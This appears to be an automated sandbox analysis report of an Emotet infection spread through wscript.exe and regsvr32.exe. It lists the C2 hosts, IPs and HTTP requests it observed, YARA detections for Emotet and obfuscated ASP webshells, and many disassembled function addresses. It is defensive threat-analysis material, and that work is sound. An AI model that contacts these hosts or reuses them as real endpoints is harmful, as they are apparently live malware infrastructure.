              Source: wscript.exe, wscript.exe, 00000009.00000002.353832790.00000000053B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349674998.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347830775.0000000005237000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347700894.0000000005210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.335628212.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349283109.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.338453916.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345054891.00000000050AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348896452.0000000005346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351239933.00000000052BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.340495152.0000000004F55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348209733.0000000005208000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349520694.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347622434.000000000512D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/
              Source: wscript.exe, 00000009.00000003.350048423.0000000004B54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/vM
              Source: unknownHTTP traffic detected: POST /qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 182.162.143.56
              Source: unknownDNS traffic detected: queries for: penshorn.org
              Source: global trafficHTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org
              Source: unknownHTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.3:49683 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49687 version: TLS 1.2

              E-Banking Fraud

              barindex
              Yara detected Emotet
              Source: Yara matchFile source: 0000000C.00000002.579579352.0000000001268000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 12.2.regsvr32.exe.1220000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.regsvr32.exe.1220000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.regsvr32.exe.f10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.regsvr32.exe.f10000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000002.580204342.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.579427861.0000000001220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.334703858.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: 00000009.00000003.348706974.000000000518A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
              Source: 00000009.00000003.348706974.000000000518A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
              Source: 00000009.00000003.346224913.0000000005175000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
              Source: 00000009.00000003.347622434.0000000005182000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
              Source: 00000009.00000003.347622434.0000000005182000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
              Source: 00000009.00000002.353529377.000000000518B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
              Source: 00000009.00000002.353529377.000000000518B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
              Source: 00000009.00000003.347751255.0000000005182000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
              Source: 00000009.00000003.347751255.0000000005182000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
              Source: 00000009.00000003.348256209.0000000005189000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
              Source: 00000009.00000003.348256209.0000000005189000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
              Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\ZLTlFkhzfcDaCjB\Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_000000018000681811_2_0000000180006818
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_000000018000B87811_2_000000018000B878
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_000000018000711011_2_0000000180007110
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0000000180008D2811_2_0000000180008D28
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_000000018001455511_2_0000000180014555
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00EF000011_2_00EF0000
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5709C11_2_00F5709C
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4CC1411_2_00F4CC14
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5A00011_2_00F5A000
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F47D6C11_2_00F47D6C
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4263C11_2_00F4263C
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F48BC811_2_00F48BC8
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F58FC811_2_00F58FC8
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F43CF411_2_00F43CF4
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F448FC11_2_00F448FC
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F490F811_2_00F490F8
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F520E011_2_00F520E0
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F414D411_2_00F414D4
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F53CD411_2_00F53CD4
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F418DC11_2_00F418DC
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4F8C411_2_00F4F8C4
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F55CC411_2_00F55CC4
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F480CC11_2_00F480CC
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F508CC11_2_00F508CC
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5A8B011_2_00F5A8B0
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F694BC11_2_00F694BC
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4DCB811_2_00F4DCB8
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F498AC11_2_00F498AC
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4AC9411_2_00F4AC94
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F44C8411_2_00F44C84
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5CC8411_2_00F5CC84
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5588011_2_00F55880
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4D47411_2_00F4D474
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F56C7011_2_00F56C70
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4B07C11_2_00F4B07C
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F42C7811_2_00F42C78
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4C07811_2_00F4C078
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5B46011_2_00F5B460
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F6545011_2_00F65450
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5C05811_2_00F5C058
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4784011_2_00F47840
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5C44C11_2_00F5C44C
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5103011_2_00F51030
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5EC3011_2_00F5EC30
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4B83C11_2_00F4B83C
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F6181C11_2_00F6181C
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4100011_2_00F41000
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4940811_2_00F49408
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F47C0811_2_00F47C08
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5D5F011_2_00F5D5F0
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F515C811_2_00F515C8
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F495BC11_2_00F495BC
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5BDA011_2_00F5BDA0
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4753011_2_00F47530
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5B13011_2_00F5B130
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4613811_2_00F46138
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5192411_2_00F51924
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F54D2011_2_00F54D20
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5AD2811_2_00F5AD28
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F6991011_2_00F69910
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5751811_2_00F57518
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F6850011_2_00F68500
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5610C11_2_00F5610C
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F492F011_2_00F492F0
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F596D411_2_00F596D4
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5EAC011_2_00F5EAC0
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4D6CC11_2_00F4D6CC
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F43ABC11_2_00F43ABC
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5A6BC11_2_00F5A6BC
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4AAB811_2_00F4AAB8
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F44EB811_2_00F44EB8
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4BE9011_2_00F4BE90
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F54A9011_2_00F54A90
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F48A8C11_2_00F48A8C
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F64E8C11_2_00F64E8C
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4327411_2_00F43274
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F50A7011_2_00F50A70
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4A66011_2_00F4A660
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4F65C11_2_00F4F65C
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4B25811_2_00F4B258
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5A24411_2_00F5A244
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4BA2C11_2_00F4BA2C
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F58A2C11_2_00F58A2C
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F50E2C11_2_00F50E2C
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5662C11_2_00F5662C
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4421411_2_00F44214
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4461C11_2_00F4461C
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F55A0011_2_00F55A00
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F68A0011_2_00F68A00
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F43E0C11_2_00F43E0C
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5020C11_2_00F5020C
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F58E0811_2_00F58E08
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4A7F011_2_00F4A7F0
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F627EC11_2_00F627EC
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F42FD411_2_00F42FD4
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F433D411_2_00F433D4
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F53FD011_2_00F53FD0
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F597CC11_2_00F597CC
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F48FB011_2_00F48FB0
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4FFB811_2_00F4FFB8
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F58BB811_2_00F58BB8
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4DBA011_2_00F4DBA0
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F41B9411_2_00F41B94
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5538411_2_00F55384
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5D77011_2_00F5D770
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5CF7011_2_00F5CF70
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4F77C11_2_00F4F77C
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4837811_2_00F48378
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5E75011_2_00F5E750
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4975C11_2_00F4975C
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4475811_2_00F44758
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4D33C11_2_00F4D33C
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F4EF1411_2_00F4EF14
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F53B1411_2_00F53B14
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F5E31011_2_00F5E310
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00F54F1811_2_00F54F18
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0121000012_2_01210000
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B276A812_2_02B276A8
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B3061812_2_02B30618
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B16E4212_2_02B16E42
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B373A412_2_02B373A4
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B163F412_2_02B163F4
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B23FD012_2_02B23FD0
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B18BC812_2_02B18BC8
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B28FC812_2_02B28FC8
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B19B7912_2_02B19B79
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B208CC12_2_02B208CC
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1CC1412_2_02B1CC14
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1640A12_2_02B1640A
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B17D6C12_2_02B17D6C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B32AB012_2_02B32AB0
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1AAB812_2_02B1AAB8
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B14EB812_2_02B14EB8
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B13ABC12_2_02B13ABC
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2A6BC12_2_02B2A6BC
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1BE9012_2_02B1BE90
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B24A9012_2_02B24A90
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B32E8412_2_02B32E84
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B18A8C12_2_02B18A8C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B34E8C12_2_02B34E8C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B192F012_2_02B192F0
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B336FC12_2_02B336FC
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B296D412_2_02B296D4
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2EAC012_2_02B2EAC0
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1D6CC12_2_02B1D6CC
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1263C12_2_02B1263C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1BA2C12_2_02B1BA2C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B28A2C12_2_02B28A2C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B20E2C12_2_02B20E2C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2662C12_2_02B2662C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1421412_2_02B14214
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1461C12_2_02B1461C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B25A0012_2_02B25A00
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B38A0012_2_02B38A00
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B28E0812_2_02B28E08
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B13E0C12_2_02B13E0C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2020C12_2_02B2020C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B20A7012_2_02B20A70
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1327412_2_02B13274
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1A66012_2_02B1A660
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1B25812_2_02B1B258
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1F65C12_2_02B1F65C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2A24412_2_02B2A244
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B36E4812_2_02B36E48
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B18FB012_2_02B18FB0
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1FFB812_2_02B1FFB8
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B28BB812_2_02B28BB8
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1DBA012_2_02B1DBA0
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B347A812_2_02B347A8
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B11B9412_2_02B11B94
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2538412_2_02B25384
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1A7F012_2_02B1A7F0
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2FFFC12_2_02B2FFFC
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B327EC12_2_02B327EC
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B12FD412_2_02B12FD4
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B133D412_2_02B133D4
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B297CC12_2_02B297CC
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1D33C12_2_02B1D33C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2E31012_2_02B2E310
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B3831012_2_02B38310
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1EF1412_2_02B1EF14
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B23B1412_2_02B23B14
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B24F1812_2_02B24F18
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B35B1C12_2_02B35B1C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2D77012_2_02B2D770
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2CF7012_2_02B2CF70
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1837812_2_02B18378
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1F77C12_2_02B1F77C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B38B6812_2_02B38B68
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2E75012_2_02B2E750
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1475812_2_02B14758
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1975C12_2_02B1975C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2A8B012_2_02B2A8B0
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1DCB812_2_02B1DCB8
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B394BC12_2_02B394BC
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B344A812_2_02B344A8
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B198AC12_2_02B198AC
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1AC9412_2_02B1AC94
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B3149412_2_02B31494
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2709C12_2_02B2709C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2588012_2_02B25880
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B14C8412_2_02B14C84
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2CC8412_2_02B2CC84
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B3488C12_2_02B3488C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B13CF412_2_02B13CF4
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B190F812_2_02B190F8
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B148FC12_2_02B148FC
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B220E012_2_02B220E0
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B114D412_2_02B114D4
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B23CD412_2_02B23CD4
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B31CD412_2_02B31CD4
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B118DC12_2_02B118DC
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1F8C412_2_02B1F8C4
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B25CC412_2_02B25CC4
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B180CC12_2_02B180CC
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2103012_2_02B21030
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2EC3012_2_02B2EC30
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1B83C12_2_02B1B83C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1741012_2_02B17410
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B3181C12_2_02B3181C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1100012_2_02B11000
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2A00012_2_02B2A000
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1940812_2_02B19408
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B17C0812_2_02B17C08
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B26C7012_2_02B26C70
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1D47412_2_02B1D474
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B12C7812_2_02B12C78
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1C07812_2_02B1C078
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B1B07C12_2_02B1B07C
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B2B46012_2_02B2B460
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B3586812_2_02B35868
              Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02B3545012_2_02B35450
